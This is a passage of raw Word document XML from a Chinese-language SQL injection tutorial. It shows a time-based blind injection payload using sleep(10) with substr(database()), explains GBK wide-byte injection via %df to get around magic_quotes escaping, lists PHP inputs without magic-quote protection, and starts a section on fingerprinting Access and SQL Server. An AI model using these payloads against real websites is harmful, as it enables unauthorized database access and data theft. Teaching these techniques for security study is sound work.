    <w:p w14:paraId="63C2C9C0" w14:textId="77777777" w:rsidR="00940535" w:rsidRPr="00940535" w:rsidRDefault="00940535" w:rsidP="00940535">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940535">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">基于时间的延迟，构造一个拼接语句： </w:t>
      </w:r>
      <w:r w:rsidR="008E42C8" w:rsidRPr="008E42C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vince' and if(substr(database(),1,1)='</w:t>
      </w:r>
      <w:r w:rsidR="008E42C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="008E42C8" w:rsidRPr="008E42C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="008E42C8" w:rsidRPr="00940535">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00940535">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(猜测点)',sleep(10),null#，输入后，如果猜测真确，那么就会响应1</w:t>
      </w:r>
      <w:r w:rsidR="008E42C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00940535">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>秒，如果错误会立刻返回错误。输入：</w:t>
      </w:r>
      <w:r w:rsidR="008E42C8" w:rsidRPr="008E42C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vince' and if(substr(database(),1,1)='p',sleep(10),null)#</w:t>
      </w:r>
      <w:r w:rsidRPr="00940535">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,再web控制台下，判断出database的表名的一个字符为p。通过这个办法我们就能逐步向下获取数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C2AD81" w14:textId="77777777" w:rsidR="00E35E06" w:rsidRDefault="008E42C8"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671FDE3E" wp14:editId="4C9DD9F2">
            <wp:extent cx="5278120" cy="1456633"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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278120" cy="1456633"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41871723" w14:textId="77777777" w:rsidR="008E42C8" w:rsidRDefault="008E42C8" w:rsidP="00FD2E3F">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5EBF088E" wp14:editId="61B82226">
            <wp:extent cx="5278120" cy="1535786"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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5278120" cy="1535786"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="768F7B6B" w14:textId="77777777" w:rsidR="00F35449" w:rsidRPr="009E7F7C" w:rsidRDefault="00F35449" w:rsidP="00F35449">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1.</w:t>
      </w:r>
      <w:r w:rsidR="00391306">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00BA415A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000A7B93">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>宽字节</w:t>
      </w:r>
      <w:r w:rsidRPr="008E1A7B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>注</w:t>
      </w:r>
      <w:r w:rsidR="000A7B93">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797EB2AD" w14:textId="77777777" w:rsidR="00825DAA" w:rsidRPr="00894A15" w:rsidRDefault="00825DAA" w:rsidP="00825DAA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当我们把php.ini文件里面的magic_quotes_gqc参数设为ON时，所有的'（单引号），"(双引号)，\(反斜杠)和null字符都会被自动加上一个反斜杠进行转义。还有很多函数有类似的作用如：addslashes()、mysql_escape_string()、mysql_real_escape_string()等，另外还有parse_str()后的变量也受magic_quotes_gpc的影响。目前大多数的主机都打开了这个选项，并且很多程序员也注意使用上面那些函数去过滤变量，这看上去很安全，很多漏洞查找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>者</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>或者工具遇到这些函数过滤后的变量直接就放弃，但是就在他们放弃的同时也放</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>过很多致命的安全漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C998BF7" w14:textId="4F241870" w:rsidR="00825DAA" w:rsidRDefault="00825DAA" w:rsidP="00825DAA">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其中\的</w:t>
      </w:r>
      <w:r w:rsidR="00F90465">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL编码</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是 %5C ，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">当我们在单引号前面加上%df的时候，最终就会变成 </w:t>
      </w:r>
      <w:r w:rsidRPr="0023782F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>運'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，如果程序的默认字符集是GBK等宽字节字符集，则MYSQL用GBK的编码时，会认为 %df 是一个宽字符，也就是</w:t>
      </w:r>
      <w:r w:rsidRPr="0023782F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>運</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，也就是说：%df\’ = %df%5c%27=縗’，有了单引号就好注入了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799B329B" w14:textId="77777777" w:rsidR="00825DAA" w:rsidRDefault="00825DAA" w:rsidP="00825DAA">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 =======&gt;\'单引号转义后占两个字节，所以我们需要通过繁体字%df构造两个字节,最终用</w:t>
      </w:r>
      <w:r w:rsidRPr="0023782F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>運</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>干掉了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D015DB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也就是说被</w:t>
      </w:r>
      <w:r w:rsidRPr="0023782F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>運</w:t>
      </w:r>
      <w:r w:rsidRPr="00D015DB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>占领了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">\ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D015DB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所以最后在页面也不会显示出来.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F16722" w14:textId="77777777" w:rsidR="00825DAA" w:rsidRDefault="00825DAA" w:rsidP="00825DAA">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小提示: 数字和字母占一个字节，汉字占两个字节。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350E62E3" w14:textId="77777777" w:rsidR="00825DAA" w:rsidRDefault="00825DAA" w:rsidP="00825DAA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693EA0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70030197" wp14:editId="3E60EC60">
            <wp:extent cx="5275025" cy="2578443"/>
            <wp:effectExtent l="19050" t="0" r="1825"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278120" cy="2579956"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F468A6" w14:textId="7E47381E" w:rsidR="00825DAA" w:rsidRDefault="001E53BB" w:rsidP="00825DAA">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2758F5B8" wp14:editId="01859F91">
            <wp:extent cx="4695172" cy="3556000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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4699510" cy="3559285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D40CAD1" w14:textId="51B749B1" w:rsidR="00880117" w:rsidRPr="00880117" w:rsidRDefault="00880117" w:rsidP="00825DAA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00880117">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注意：宽字节空格、#如果被U</w:t>
      </w:r>
      <w:r w:rsidRPr="00880117">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RL</w:t>
      </w:r>
      <w:r w:rsidRPr="00880117">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编码了，可能造成不能成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525F5509" w14:textId="77777777" w:rsidR="00825DAA" w:rsidRPr="001E53BB" w:rsidRDefault="00825DAA" w:rsidP="001E53BB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="95" w:firstLine="267"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E53BB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>哪些地方没有魔术引号的保护</w:t>
      </w:r>
      <w:r w:rsidR="001E53BB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4E24F8" w14:textId="77777777" w:rsidR="00825DAA" w:rsidRPr="00CD76A0" w:rsidRDefault="00825DAA" w:rsidP="00825DAA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>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1） $_SERVER 变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ED0AC0" w14:textId="77777777" w:rsidR="00825DAA" w:rsidRPr="00CD76A0" w:rsidRDefault="00825DAA" w:rsidP="00825DAA">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 xml:space="preserve">  PHP5的$_SERVER变量缺少magic_quotes_gqc的保护，导致近年来X-Forwarded-For的漏洞猛爆，所以很多程序员考虑过滤X-Forwarded-For，但是其它的变量呢？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC21442" w14:textId="77777777" w:rsidR="00825DAA" w:rsidRPr="00CD76A0" w:rsidRDefault="00825DAA" w:rsidP="00825DAA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>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2）getenv()得到的变量（使用类似$_SERVER 变量）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068FFDC6" w14:textId="77777777" w:rsidR="00825DAA" w:rsidRPr="00200887" w:rsidRDefault="00825DAA" w:rsidP="00825DAA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>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3）$HTTP_RAW_POST_DATA与PHP输入、输出流</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D074794" w14:textId="77777777" w:rsidR="00F35449" w:rsidRPr="008F76EB" w:rsidRDefault="00825DAA" w:rsidP="00F35449">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76EB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B51F0DF" w14:textId="77777777" w:rsidR="006F07E3" w:rsidRPr="00234A5F" w:rsidRDefault="006F07E3" w:rsidP="00A2480F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1192A1BC" w14:textId="77777777" w:rsidR="0091459E" w:rsidRPr="00F838F6" w:rsidRDefault="0091459E" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F838F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00F838F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="00F838F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>注入攻击基本技术</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4153738D" w14:textId="77777777" w:rsidR="0091459E" w:rsidRPr="00C76351" w:rsidRDefault="0091459E" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76351">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>爆出数据库类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3984C24A" w14:textId="77777777" w:rsidR="0091459E" w:rsidRPr="00764DAB" w:rsidRDefault="0091459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SQL Server有一些系统变量和系统表，如果服务器IIS提示没关闭，并且SQL Server返回错误提示的话，可以直接从出错信息中获取判断数据库的类型</w:t>
      </w:r>
      <w:r w:rsidR="00C76351" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（后面会给大家讲解如何突破IIS提示被关闭）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351E5119" w14:textId="77777777" w:rsidR="0091459E" w:rsidRPr="00E76A07" w:rsidRDefault="00C37A81" w:rsidP="009C0A88">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.4.1.1</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0091459E" w:rsidRPr="00E76A07">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内</w:t>
      </w:r>
      <w:r w:rsidR="00C215A8" w:rsidRPr="00E76A07">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>置</w:t>
      </w:r>
      <w:r w:rsidR="0091459E" w:rsidRPr="00E76A07">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量爆数据库类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6719F91B" w14:textId="77777777" w:rsidR="0091459E" w:rsidRPr="00764DAB" w:rsidRDefault="00C0718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User</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="0091459E" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
